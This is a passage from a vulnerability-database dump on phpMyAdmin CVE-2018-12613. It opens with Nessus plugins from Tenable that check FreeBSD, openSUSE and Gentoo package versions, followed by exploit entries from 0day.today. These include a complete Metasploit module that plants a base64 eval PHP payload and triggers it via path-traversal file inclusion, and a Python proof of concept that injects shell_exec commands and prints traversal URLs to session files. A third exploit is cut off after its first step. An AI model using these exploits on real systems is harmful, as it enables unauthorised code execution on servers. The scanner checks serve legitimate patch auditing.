ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110675);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/04\");\n\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n\n script_name(english:\"FreeBSD : phpmyadmin -- remote code inclusion and XSS scripting (17cb6ff3-7670-11e8-8854-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The phpMyAdmin development team reports 
: Summary XSS in Designer\nfeature Description A Cross-Site Scripting vulnerability was found in\nthe Designer feature, where an attacker can deliver a payload to a\nuser through a specially crafted database name. Severity We consider\nthis attack to be of moderate severity. Summary File inclusion and\nremote code execution attack Description A flaw has been discovered\nwhere an attacker can include (view and potentially execute) files on\nthe server.\n\nThe vulnerability comes from a portion of code where pages are\nredirected and loaded within phpMyAdmin, and an improper test for\nwhitelisted pages.\n\nAn attacker must be authenticated, except in these situations :\n\n- $cfg['AllowArbitraryServer'] = true: attacker can specify any host\nhe/she is already in control of, and execute arbitrary code on\nphpMyAdmin\n\n- $cfg['ServerDefault'] = 0: this bypasses the login and runs the\nvulnerable code without any authentication Severity We consider this\nto be severe. Mitigation factor Configuring PHP with a restrictive\n`open_basedir` can greatly restrict an attacker's ability to view\nfiles on the server. 
Vulnerable systems should not be run with the\nphpMyAdmin directives $cfg['AllowArbitraryServer'] = true or\n$cfg['ServerDefault'] = 0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2018-3/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2018-4/\"\n );\n # https://vuxml.freebsd.org/freebsd/17cb6ff3-7670-11e8-8854-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d30c0ecb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpmyadmin<4.8.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:09:19", "description": "This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains a number of upstream bug fixes and improvements.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-2019-490)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpmyadmin", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-490.NASL", "href": "https://www.tenable.com/plugins/nessus/123202", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in 
this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-490.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123202);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-2019-490)\");\n script_summary(english:\"Check for the openSUSE-2019-490 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution\n attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains number of upstream bug\nfixes and improvements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098752\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n 
script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"phpMyAdmin-4.8.2-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:10:30", "description": "The remote host is affected by the vulnerability described in GLSA-201904-16 (phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the CVE identifiers referenced below for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "GLSA-201904-16 : phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-19968", "CVE-2018-19969", "CVE-2018-19970"], "modified": "2020-01-23T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:phpmyadmin"], "id": "GENTOO_GLSA-201904-16.NASL", "href": "https://www.tenable.com/plugins/nessus/124072", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201904-16.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124072);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2018-12613\", \"CVE-2018-19968\", \"CVE-2018-19969\", \"CVE-2018-19970\");\n script_xref(name:\"GLSA\", value:\"201904-16\");\n\n script_name(english:\"GLSA-201904-16 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201904-16\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the CVE identifiers referenced below for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201904-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.8.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-19969\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 4.8.4\"), vulnerable:make_list(\"lt 4.8.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-07-13T03:59:36", "description": "phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. 
The module has been tested with phpMyAdmin v4.8.1.", "cvss3": {}, "published": "2018-07-13T00:00:00", "type": "zdt", "title": "phpMyAdmin Authenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30714", "href": "https://0day.today/exploit/description/30714", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'phpMyAdmin Authenticated Remote Code Execution',\r\n 'Description' => %q{\r\n phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,\r\n which can be exploited post-authentication to execute PHP code by\r\n application. The module has been tested with phpMyAdmin v4.8.1.\r\n },\r\n 'Author' =>\r\n [\r\n 'ChaMd5', # Vulnerability discovery and PoC\r\n 'Henry Huang', # Vulnerability discovery and PoC\r\n 'Jacob Robles' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'BID', '104532' ],\r\n [ 'CVE', '2018-12613' ],\r\n [ 'CWE', '661' ],\r\n [ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ],\r\n [ 'URL', 'https://www.secpulse.com/archives/72817.html' ],\r\n [ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => [ 'php' ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows', {} ],\r\n [ 'Linux', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jun 19 2018'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base phpMyAdmin directory path\", '/phpmyadmin/']),\r\n OptString.new('USERNAME', [ true, \"Username to authenticate 
with\", 'root']),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })\r\n rescue\r\n vprint_error(\"#{peer} - Unable to connect to server\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if res.nil? || res.code != 200\r\n vprint_error(\"#{peer} - Unable to query /js/messages.php\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n # v4.8.0 || 4.8.1 phpMyAdmin\r\n if res.body =~ /PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"/\r\n version = Gem::Version.new($1)\r\n vprint_status(\"#{peer} - phpMyAdmin version: #{version}\")\r\n\r\n if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1')\r\n return Exploit::CheckCode::Appears\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def query(uri, qstring, cookies, token)\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'import.php'),\r\n 'cookie' => cookies,\r\n 'vars_post' => Hash[{\r\n 'sql_query' => qstring,\r\n 'db' => '',\r\n 'table' => '',\r\n 'token' => token\r\n }.to_a.shuffle]\r\n })\r\n end\r\n\r\n def lfi(uri, data_path, cookies, token)\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'cookie' => cookies,\r\n 'encode_params' => false,\r\n 'vars_get' => {\r\n 'target' => \"db_sql.php%253f#{'/..'*16}#{data_path}\"\r\n }\r\n })\r\n end\r\n\r\n def exploit\r\n unless check == Exploit::CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable')\r\n end\r\n\r\n uri = target_uri.path\r\n vprint_status(\"#{peer} - Grabbing CSRF token...\")\r\n\r\n response = send_request_cgi({'uri' => uri})\r\n\r\n if response.nil?\r\n fail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage grabbing CSRF token\")\r\n elsif response.body !~ /token\"\\s*value=\"(.*?)\"/\r\n 
fail_with(Failure::NotFound, \"#{peer} - Couldn't find token. Is URI set correctly?\")\r\n end\r\n token = Rex::Text.html_decode($1)\r\n\r\n if target.name =~ /Automatic/\r\n /\\((?<srv>Win.*)?\\)/ =~ response.headers['Server']\r\n mytarget = srv.nil? ? 'Linux' : 'Windows'\r\n else\r\n mytarget = target.name\r\n end\r\n\r\n vprint_status(\"#{peer} - Identified #{mytarget} target\")\r\n\r\n #Pull out the last two cookies\r\n cookies = response.get_cookies\r\n cookies = cookies.split[-2..-1].join(' ')\r\n\r\n vprint_status(\"#{peer} - Retrieved token #{token}\")\r\n vprint_status(\"#{peer} - Retrieved cookies #{cookies}\")\r\n vprint_status(\"#{peer} - Authenticating...\")\r\n\r\n login = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'cookie' => cookies,\r\n 'vars_post' => {\r\n 'token' => token,\r\n 'pma_username' => datastore['USERNAME'],\r\n 'pma_password' => datastore['PASSWORD']\r\n }\r\n })\r\n\r\n if login.nil? || login.code != 302\r\n fail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\")\r\n end\r\n\r\n #Ignore the first cookie\r\n cookies = login.get_cookies\r\n cookies = cookies.split[1..-1].join(' ')\r\n vprint_status(\"#{peer} - Retrieved cookies #{cookies}\")\r\n\r\n login_check = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'token' => token },\r\n 'cookie' => cookies\r\n })\r\n\r\n if login_check.nil?\r\n fail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\")\r\n elsif login_check.body.include? 'Welcome to'\r\n fail_with(Failure::NoAccess, \"#{peer} - Authentication failed\")\r\n elsif login_check.body !~ /token\"\\s*value=\"(.*?)\"/\r\n fail_with(Failure::NotFound, \"#{peer} - Couldn't find token. 
Is URI set correctly?\")\r\n end\r\n token = Rex::Text.html_decode($1)\r\n\r\n vprint_status(\"#{peer} - Authentication successful\")\r\n\r\n #Generating strings/payload\r\n database = rand_text_alpha_lower(5)\r\n table = rand_text_alpha_lower(5)\r\n column = rand_text_alpha_lower(5)\r\n col_val = \"'<?php eval(base64_decode(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\")); ?>'\"\r\n\r\n\r\n #Preparing sql queries\r\n dbsql = \"CREATE DATABASE #{database};\"\r\n tablesql = \"CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});\"\r\n dropsql = \"DROP DATABASE #{database};\"\r\n dirsql = 'SHOW VARIABLES WHERE Variable_Name Like \"%datadir\";'\r\n\r\n #Create database\r\n res = query(uri, dbsql, cookies, token)\r\n if res.nil? || res.code != 200\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create database\")\r\n end\r\n\r\n #Create table and column\r\n res = query(uri, tablesql, cookies, token)\r\n if res.nil? || res.code != 200\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create table\")\r\n end\r\n\r\n #Find datadir\r\n res = query(uri, dirsql, cookies, token)\r\n if res.nil? || res.code != 200\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\")\r\n end\r\n\r\n unless res.body =~ /^<td data.*?>(.*)?</\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\")\r\n end\r\n\r\n #Creating include path\r\n if mytarget == 'Windows'\r\n #Table file location\r\n data_path = $1.gsub(/\\\\/, '/')\r\n data_path = data_path.sub(/^.*?\\//, '/')\r\n data_path << \"#{database}/#{table}.frm\"\r\n else\r\n #Session path location\r\n /phpMyAdmin=(?<session_name>.*?);/ =~ cookies\r\n data_path = \"/var/lib/php/sessions/sess_#{session_name}\"\r\n end\r\n\r\n res = lfi(uri, data_path, cookies, token)\r\n\r\n #Drop database\r\n res = query(uri, dropsql, cookies, token)\r\n if res.nil? 
|| res.code != 200\r\n print_error(\"#{peer} - Failed to drop database #{database}. Might drop when your session closes.\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-07-13] #", "sourceHref": "https://0day.today/exploit/30714", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-18T08:07:26", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-11-27T00:00:00", "type": "zdt", "title": "phpMyAdmin 4.8.1 Authenticated Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-11-27T00:00:00", "id": "1337DAY-ID-31685", "href": "https://0day.today/exploit/description/31685", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion\r\n# Exploit Author: Lucian Ioan Nitescu\r\n# Contact: https://twitter.com/LucianNitescu\r\n# Webiste: https://nitesculucian.github.io\r\n# Vendor Homepage: https://www.phpmyadmin.net/\r\n# Software Link: https://www.phpmyadmin.net/files/4.8.1/\r\n# Version: 4.8.1\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2018-12613\r\n\r\n# 1. Description: \r\n\r\n# An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).\r\n\r\n# 2. 
Proof of Concept:\r\n\r\nimport requests\r\n\r\n# input the target\r\nVALID_PHPMYADMIN_URL = \"\"\r\n\r\n# input a valid session (After authentification)\r\nVALID_PHPMYADMIN_SESSION = \"\"\r\n\r\nburp0_url = VALID_PHPMYADMIN_URL + \"/import.php\"\r\nburp0_cookies = {\"phpMyAdmin\": VALID_PHPMYADMIN_SESSION, \"pma_lang\": \"en\", \"pmaUser-1\": \"%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D\", \"pmaAuth-1\": \"%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D\"}\r\nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"}\r\nburp0_data={\"is_js_confirmed\": \"0\", \"token\": \"?[[email\u00a0protected]?OUd\", \"pos\": \"0\", \"goto\": \"server_sql.php\", \"message_to_show\": \"Your SQL query has been executed successfully.\", \"prev_sql_query\": '', \"sql_query\": \"select '<?php $output = shell_exec(\\\"ls -al; date; id;\\\");echo \\\"<pre>$output</pre>\\\";exit;?>'\", \"sql_delimiter\": \";\", \"show_query\": \"1\", \"fk_checks\": \"0\", \"fk_checks\": \"1\", \"SQL\": \"Go\", \"ajax_request\": \"true\", \"ajax_page_request\": \"true\", \"_nocache\": \"1543255823534938840\", \"token\": \"?[[email\u00a0protected]?OUd\"}\r\nrequests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)\r\n\r\nprint \"While autentificated:\"\r\n\r\nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_\" + VALID_PHPMYADMIN_SESSION\r\n\r\nprint \"- Please 
check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_\" + VALID_PHPMYADMIN_SESSION\r\n\r\n# 3. Solution:\r\n\r\n# Upgrade to version 4.8.2 or above.\n\n# 0day.today [2018-12-18] #", "sourceHref": "https://0day.today/exploit/31685", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-23T01:45:53", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-06-22T00:00:00", "type": "zdt", "title": "phpMyAdmin 4.8.1 Code Execution / Local File Inclusion Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "1337DAY-ID-30622", "href": "https://0day.today/exploit/description/30622", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution\r\n# Exploit Author: VulnSpy\r\n# Vendor Homepage: http://www.phpmyadmin.net\r\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\r\n# Version: 4.8.0, 4.8.1\r\n# Tested on: php7 mysql5\r\n# CVE : CVE-2018-12613\r\n \r\n1. Run SQL Query : select '<?php phpinfo();exit;?>'\r\n2. 
